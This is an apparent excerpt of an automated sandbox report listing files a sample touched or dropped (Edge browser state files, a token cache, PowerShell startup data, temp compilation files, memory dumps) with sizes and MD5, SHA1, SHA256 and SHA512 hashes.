  SHA512  2888982860091421f89f3d7444cacccb1938ef70fc084d3028d8a29021e6e1d83eaef62108eace2f0d590ed41ece0e443d8b564e9c9a860fc48d766edb1dc3d9

• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
  Filesize  54KB
  MD5       3d77be4e6fb0f8a3c56d9c92f75238f5
  SHA1      e90d47a05d3fe08d2d470f9a9eca074a9e3d3e05
  SHA256    870a8545b4b771c55b292d0f1211ac5854c8271c7d40c6346d97acc0b06ebc32
  SHA512    f15204efb70fdfcfaf329c79640e5764710c13369c29152ee3c37ae7e9a6aa0e4b870b52939b3f7b484398caffd00a0712cceaa8125974f3e1da23d62cc04cf6

• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
  Filesize  60KB
  MD5       cf78923b1061eb5c2425ab720d52f025
  SHA1      f1d2b9e827c4aeed8e74926ab7f2f8e773c4ce20
  SHA256    55329a3f6fa53319f94ae1beda9da4cd32ecace3f132065e90b8713dd0a27480
  SHA512    04728ffb7576a1e3caf252323a137c62bac1f346cea5dcc2819554ec5b7b37a9599f5c69e2e99ad48d86e32c95f7bce0964fe6f5753d5f7645585c48e819c9d1

• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
  Filesize  54KB
  MD5       8afaaea552ecbc45e03f751611272c18
  SHA1      8b038e38ee52b080fbc0424c7afe720a6044be77
  SHA256    71924716e2eb2afb5946370bb9e2941051a338765ac99b8e7dbb54afcb92f822
  SHA512    83f328e1e874c2b40155e68873dc6b0096ae335fd2c69d5c71fe177e85aec3e509c4af16460c1741b31b2d6dd02b239e909380bb30a4d1411e55accc22190509

• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
  Filesize  48KB
  MD5       537262650d4221699a6180d3ce84fdb3
  SHA1      5cafcd2d37a20431bd9d986d35b9038e76d26188
  SHA256    aa0b30c4cfacb932a93fff721cd57a57647016b2564af660eca00f2b8c90efb2
  SHA512    9dbe72d03c0d36d9e82b256afaa4cd454d9f97547c90f1f3313c624bbfb30fdf195bc7b90122470f4eab6e62434ffa78569118d2200cb81f0d77c0c0271b0a91

• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
  Filesize  39KB
  MD5       d96dd443513e4309f4f3944b61a8d1c1
  SHA1      dbefb726f1a23b2793ddceb8b28daa469b85a45f
  SHA256    e54750ee8dcad9bfd302c17aac33de2b7f739465a93173eb05b18723e00a15cb
  SHA512    b1e72d4eb8a521c342cd3bc7dd9df665146b1fc927fa2a76a84817efcc7df756c01e13278327b80587a24e9a5c4351055de67597f28c122da21f62c01d1acc86

• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
  Filesize  48KB
  MD5       c416f81c37e0f72d4746edf9a89bbc54
  SHA1      8ec3b2170d409e02239b75a5c5405f66b98dca13
  SHA256    0d6758e7fb9e6c1326868a83af435ac7575ae538cf6c41544f595290a9ca2c37
  SHA512    a525cdca6ea1e64f5c1d229cbe01653068e21c416592ce29641c86ac090388e905c0169ffb15c55e8781d49d765175a64637957b69757824ca3826a806c1b38e

• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
  Filesize  60KB
  MD5       fe437529e0ecb65f8ea2cc50daea3899
  SHA1      2faeeef44602621742c2fb9a90bc1517c1e0c29b
  SHA256    b05940392ccaa815aac800b3aa86a381c617054e3c4bfe121a437bab36dd6789
  SHA512    b3b85b83e73227162f6f5324f0b4aa9ac45919dbb81367e3545ab60a770f9a15984de3a9da279d5c873788e5db4e9ae3e15cea981ab0cef18742d0a74c0f7080

• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
  Filesize  53KB
  MD5       90a5606583dbb1614bf2b8c9918acfa6
  SHA1      ecb19923d93c48dbd53eeb222f373802c8a13970
  SHA256    2664189f9ea49ef5dc74af1c36f02a882d371aca227ecff651a43ecccc943f5d
  SHA512    d96814eccabaaf7177e31a34e2999a319da291c7c1ee4f88321947d5a083e35056f3cd7246afdad59e4f34be36262a0a4d75f114b1fd6e9ae1ea561cbfb37a4b

• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_1
  Filesize  264KB
  MD5       3d446ab117aad530e6c654ca79e2b4c9
  SHA1      41783e7a60b076d961d56ce92586bdb393dcacd5
  SHA256    af6bd4eed84a3e7c68d45b48c3c69b7db4caa27529bd7649b5e3b94630b3976d
  SHA512    4a3eedf24363f02efd4447981fc6c8ddebaf8bc578e89a9e3d49c0492532257469bbc4766d9b8728dfa27afc230a367251c870d05e95a3d36e189dd154cbc526

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Variations

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              86B

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              961e3604f228b0d10541ebf921500c86

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              6e00570d9f78d9cfebe67d4da5efe546543949a7

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              f7b24f2eb3d5eb0550527490395d2f61c3d2fe74bb9cb345197dad81b58b5fed

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              535f930afd2ef50282715c7e48859cc2d7b354ff4e6c156b94d5a2815f589b33189ffedfcaf4456525283e993087f9f560d84cfcf497d189ab8101510a09c472

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\extensions_crx_cache\ghbmnnjooekpmoecnnnilnnbdlolhkhi_1.dff2c9d9755f96713c08f4932a9091080808ec34c0823feac2206fa526f91e60

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              153KB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              b0917d8e6c5b6be358bff67f84eb8336

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              a6e221edcb19a1cc81575b4ddd927fd9a6fbdd6d

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              dff2c9d9755f96713c08f4932a9091080808ec34c0823feac2206fa526f91e60

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              cd5822bbf91e8f7f5ab2b471a4bf8b464bde95465e2fccc6a57e5a287ca55d5062bdd6d4b3cd76f8529ee7a9081b6a7aad7dc2a7581c344ce4fd2d3256bdf451

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              2KB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              b743dd6e1e37d10331d4de4da799a788

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              c9f108a917b1dfc6a55079b09fc3fe541f94a000

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              2df81482ae971725928b1c252020dda4df151cc0d17d1fb00180c8df7a3d8e61

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              66b4372bd6b1d3256e9a8e57274493df6a8b4d54c2ffb0f893b15fa875f2f3c30921e13298d5bb1edc834e9c5d2e0d0062c3ab70e7b2452fa1e80efc752e92bd

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              1KB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              181bdc50407bf93657f4a846cc6cd613

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              36078691dedef93c030b0b2d1b66ffbae34a536a

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              e925db843a8bd0fa1b05c769f3cb24089f6fe9997a5411ac2e6a8ae15af5ee63

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              94c0e4298636e1e21f6f69bb320dbe5ea4f34bded1988f7292502b9aba926fed5fe34258b4296ca13b092795feee5b95369f354033d3931d34930cb048e06849

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              1KB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              04d926e920daa8edf6cd17ea77dce267

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              f944b3805e290fc6eafee7658fedab9b90d8fdbd

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              e5b5aba68bdaf1614dfb3fd48b99452a0c7f096f05542d5b1f71e7fd73235379

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              4d3a35178273656335f2072aa92a09bd8eef3d8f366fd4a36e81d638a4fd4be2a296f0b388ce8eb64f50604e018a7ba434afb0e71ba0da82e325e235ca225c9d

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              1KB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              e26e403816be0b5fca11ea013456c7a8

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              2d6708815cc44fb5381e22253714e447c6fe683f

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              7cdfc0addfbe865ac74595ecb178fae604e83fcfbdc91b09646aadbb9b31d89b

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              08928269fd35753be0e20f534f9af27441a5e7a901248c77c4627c3b6fc626cd9d4f4fc60e009d4a843987e69376953073834e9f36ced3415b0f44ff16bde7f5

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tweysowi.kja.ps1

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              60B

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                                                                                                                                            • \??\c:\Users\Admin\AppData\Local\Temp\zceahbm0\zceahbm0.0.cs

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              190B

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              4f82245a7a697114c52993b33e0d7e17

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              35777a662a7bc4d11ec707ea8f4c9e4ea76d6f8c

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              14f48c464ca2f67403f96d9e1a802f3fef062e68aea24c36abf51bf0e038010f

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              59021c09bfb8405d5a8448c4d9adbac9b98af8b088cbad6cef2ae9018823e52fd4690f63bce652409ef5b385d1a63a69c20629278e172c988910ac0f22cc6020

                                                                                                                                                                                                                                                                                            • \??\c:\Users\Admin\AppData\Local\Temp\zceahbm0\zceahbm0.cmdline

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              369B

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              019c97092f2887dd7be96fd93f88159b

                                                                                                                                                                                                                                                                                              SHA1

5db99c00e4657cf2648c09fa16f70a2fbada2337

SHA256
d7671dacd6c78a9b00a7ee88261d576cbfc5edb79dbd0d5365996c69f919c4b2

SHA512
90978f369f3d7c6ddfa5547be96a8c400bd9eaa42fdc8f01ef5bf12629110e88b97585f3a9a395b9283b7d8708c4cbba0151b84f92d98aaff9cc10142df2e6d0

• memory/908-1048-0x000001B5221A0000-0x000001B522316000-memory.dmp

  Filesize
  1.5MB

• memory/908-1049-0x000001B522530000-0x000001B52273A000-memory.dmp

  Filesize
  2.0MB

• memory/4276-968-0x00000252537D0000-0x00000252537F2000-memory.dmp

  Filesize
  136KB